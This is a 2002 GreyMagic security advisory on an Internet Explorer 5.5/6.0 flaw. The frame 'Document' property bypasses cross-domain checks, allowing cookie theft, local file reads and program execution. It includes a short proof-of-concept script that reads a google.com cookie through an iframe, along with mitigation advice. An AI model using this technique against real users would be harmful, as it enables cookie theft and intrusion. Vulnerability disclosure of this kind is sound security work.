home *** CD-ROM | disk | FTP | other *** search
- GreyMagic Security Advisory GM#011-IE
- =====================================
-
- By GreyMagic Software, Israel.
- 15 Oct 2002.
-
- Available in HTML format at http://security.greymagic.com/adv/gm011-ie/.
-
- Topic: Internet Explorer : The D-Day.
-
- Discovery date: 26 Sep 2002.
-
- Affected applications:
- ======================
-
- Microsoft Internet Explorer 5.5 and 6.0; prior versions and IE6 SP1 are not
- vulnerable.
-
- Note that any other application that uses Internet Explorer's engine
- (WebBrowser control) is affected as well (Outlook under the Internet zone,
- MSN Explorer, etc.).
-
-
- Introduction:
- =============
-
- The <frame> and <iframe> elements may contain URLs in other domains or
- protocols, and therefore have strict security rules, which prevent frames in
- one domain to access content and information in another. Microsoft explains
- the issue in this Cross-Frame Scripting article -
- http://msdn.microsoft.com/workshop/author/om/xframe_scripting_security.asp.
-
- There are several ways to refer to an <iframe>'s (or <frame>) document in
- Internet Explorer (assuming <iframe id="oFrameId">):
-
- * oFrameId.document
- * document.all.oFrameId.contentWindow.document
- * frames.oFrameId.document
- * And others..
-
- All these methods are handled correctly by Internet Explorer and prevent any
- attempt to access a document that originates from a foreign domain.
-
-
- Discussion:
- ===========
-
- The <iframe> and <frame> elements are really instances of the WebBrowser
- control supplied by Microsoft. The WebBrowser control exposes several
- potentially dangerous properties by default, which Microsoft overrides in
- Internet Explorer.
-
- However, Microsoft missed out on one important property -- "Document", with
- a capital "D".
-
- Normally, using "oElement.document" would provide a reference to the
- document that owns the current element. The same applies to the <frame> and
- <iframe> elements. However, we discovered that when
- "oIFrameElement.Document" is used, the returned document is the one
- contained inside the frame, and there are no security restrictions in place
- to check if it's in a different domain.
-
- This provides free and full access to the frame's Document Object Model,
- which allows an attacker to steal cookies from any site, gain access to
- content in sites (forging content), read local files and execute arbitrary
- programs on the client's machine (script in the "My Computer" zone).
-
- Both Internet Explorer 5.5 SP2 and Internet Explorer 6 are vulnerable, but
- surprisingly this vulnerability does not exist in IE6 SP1. It's hard to
- believe that Microsoft actually meant to plug it as IE5.5 remains
- vulnerable, yet somehow this stray property is now protected.
-
-
- Exploit:
- ========
-
- This exploit demonstrates how an attacker may choose to read the client's
- "google.com" cookie.
-
- <script language="jscript">
- onload=function () {
- // Timer necessary to prevent weird behavior in some conditions
- setTimeout(
- function () {
- alert(document.getElementById("oVictim").Document.cookie);
- },
- 100
- );
- }
- </script>
- <iframe src="http://google.com" id="oVictim"></iframe>
-
-
- Solution:
- =========
-
- Until a patch becomes available either disable Active Scripting or upgrade
- to IE6 SP1.
-
-
- Tested on:
- ==========
-
- IE5.5 Win98.
- IE5.5 NT4.
- IE6 Win98.
- IE6 Win2000.
- IE6 WinXP.
-
-
- Demonstration:
- ==============
-
- We put together four proof-of-concept demonstrations:
-
- * Simple: Reads the client's "google.com" cookie.
- * D-Day Console: Automatically load and execute commands on any site.
- * D-Day Reading: Read local files by accessing a res:// URL.
- * D-Day Execution: Execute arbitrary programs by accessing a res:// URL.
-
- They can all be found at http://security.greymagic.com/adv/gm011-ie/.
-
-
- Feedback:
- =========
-
- Please mail any questions or comments to security@greymagic.com.
-
- - Copyright ⌐ 2002 GreyMagic Software.
-
-
-
